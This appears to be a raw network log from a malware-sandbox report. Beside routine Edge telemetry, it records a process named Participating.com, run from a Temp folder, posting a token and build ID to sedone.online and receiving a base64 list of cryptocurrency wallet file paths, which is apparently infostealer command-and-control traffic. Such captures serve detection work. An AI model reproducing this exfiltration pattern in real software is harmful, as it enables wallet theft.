                                                                                                                                                                                                                                                                2024-12-16 12:47:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:33 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                31192.168.2.84980820.110.205.1194437920C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:26 UTC1175OUTGET /c.gif?rnd=1734353246082&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=e2a72ac00ca647b3b10ce7fbf880fcd7&activityId=e2a72ac00ca647b3b10ce7fbf880fcd7&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1
                                                                                                                                                                                                                                                                Host: c.msn.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                Cookie: _C_ETH=1; USRLOC=; MUID=162DEC371C56639E2ED8F9601DDC6260; _EDGE_S=F=1&SID=2227530D156E6C9118DD465A14EA6DDE; _EDGE_V=1
                                                                                                                                                                                                                                                                2024-12-16 12:47:27 UTC1108INHTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                Location: https://c.bing.com/c.gif?rnd=1734353246082&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=e2a72ac00ca647b3b10ce7fbf880fcd7&activityId=e2a72ac00ca647b3b10ce7fbf880fcd7&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=EB08ABDCA4E94A6AB90EB65C1E9EB8D9&RedC=c.msn.com&MXFR=162DEC371C56639E2ED8F9601DDC6260
                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                Set-Cookie: MUID=162DEC371C56639E2ED8F9601DDC6260; domain=.msn.com; expires=Sat, 10-Jan-2026 12:47:27 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:26 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                32192.168.2.84981518.173.219.844437920C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:26 UTC925OUTGET /b?rn=1734353246083&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=162DEC371C56639E2ED8F9601DDC6260&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                2024-12-16 12:47:27 UTC955INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:27 GMT
                                                                                                                                                                                                                                                                Location: /b2?rn=1734353246083&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=162DEC371C56639E2ED8F9601DDC6260&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                set-cookie: UID=1AFead9f10fa09f955f00c51734353247; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                set-cookie: XID=1AFead9f10fa09f955f00c51734353247; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                Via: 1.1 782a6f1057a52009822f51ac887d693e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: JFK52-P1
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: MZ2167b_xh2GZ8Sw3mEusrHaMJMzHfnfDpQKFxt-UA6M6oA_FDIGzg==


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                33192.168.2.849834116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:28 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----PH4O89RQIEU37YMYCJ58
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:28 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 50 48 34 4f 38 39 52 51 49 45 55 33 37 59 4d 59 43 4a 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 50 48 34 4f 38 39 52 51 49 45 55 33 37 59 4d 59 43 4a 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 50 48 34 4f 38 39 52 51 49 45 55 33 37 59 4d 59 43 4a 35 38 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------PH4O89RQIEU37YMYCJ58Content-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------PH4O89RQIEU37YMYCJ58Content-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------PH4O89RQIEU37YMYCJ58Cont
                                                                                                                                                                                                                                                                2024-12-16 12:47:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:29 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:29 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                34192.168.2.84983718.173.219.844437920C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:28 UTC1012OUTGET /b2?rn=1734353246083&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=162DEC371C56639E2ED8F9601DDC6260&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                Cookie: UID=1AFead9f10fa09f955f00c51734353247; XID=1AFead9f10fa09f955f00c51734353247
                                                                                                                                                                                                                                                                2024-12-16 12:47:29 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:29 GMT
                                                                                                                                                                                                                                                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                Via: 1.1 782a6f1057a52009822f51ac887d693e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: JFK52-P1
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: mW9eFKUT3KwrM2luREI_BOHIrlwqiyHeY0TDdfGz1TWSXo5ZXrTZVw==


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                35192.168.2.84983520.42.73.314437920C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:28 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734353246080&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Content-Length: 3812
                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                Cookie: _C_ETH=1; USRLOC=; MUID=162DEC371C56639E2ED8F9601DDC6260; _EDGE_S=F=1&SID=2227530D156E6C9118DD465A14EA6DDE; _EDGE_V=1
                                                                                                                                                                                                                                                                2024-12-16 12:47:28 UTC3812OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 36 54 31 32 3a 34 37 3a 32 36 2e 30 37 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 31 66 35 34 32 65 39 2d 38 35 38 30 2d 34 37 64 62 2d 61 39 33 63 2d 33 34 62 31 39 63 65 31 36 33 35 35 22 2c 22 65 70 6f 63 68 22 3a 22 33 32 30 37 34 38 32 38 31 34 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-16T12:47:26.075Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"51f542e9-8580-47db-a93c-34b19ce16355","epoch":"3207482814"},"app":{"locale
                                                                                                                                                                                                                                                                2024-12-16 12:47:29 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=fd27791fc8b148cfada5d1fc86e371d1&HASH=fd27&LV=202412&V=4&LU=1734353249134; Domain=.microsoft.com; Expires=Tue, 16 Dec 2025 12:47:29 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                Set-Cookie: MS0=2cf18602a721450a82e1995923a23c44; Domain=.microsoft.com; Expires=Mon, 16 Dec 2024 13:17:29 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                time-delta-millis: 3054
                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:28 GMT
                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                36192.168.2.84984320.110.205.1194437920C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:29 UTC1271OUTGET /c.gif?rnd=1734353246082&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=e2a72ac00ca647b3b10ce7fbf880fcd7&activityId=e2a72ac00ca647b3b10ce7fbf880fcd7&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=EB08ABDCA4E94A6AB90EB65C1E9EB8D9&MUID=162DEC371C56639E2ED8F9601DDC6260 HTTP/1.1
                                                                                                                                                                                                                                                                Host: c.msn.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                Cookie: _C_ETH=1; USRLOC=; MUID=162DEC371C56639E2ED8F9601DDC6260; _EDGE_S=F=1&SID=2227530D156E6C9118DD465A14EA6DDE; _EDGE_V=1; SM=T
                                                                                                                                                                                                                                                                2024-12-16 12:47:30 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                                                                                Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                Set-Cookie: MUID=162DEC371C56639E2ED8F9601DDC6260; domain=.msn.com; expires=Sat, 10-Jan-2026 12:47:29 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                Set-Cookie: SRM_M=162DEC371C56639E2ED8F9601DDC6260; domain=c.msn.com; expires=Sat, 10-Jan-2026 12:47:29 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                Set-Cookie: MR=0; domain=c.msn.com; expires=Mon, 23-Dec-2024 12:47:29 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Mon, 16-Dec-2024 12:57:29 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:28 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 42
                                                                                                                                                                                                                                                                2024-12-16 12:47:30 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                37192.168.2.849848116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:30 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----1V3EK68GV3W47QIW4WT2
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
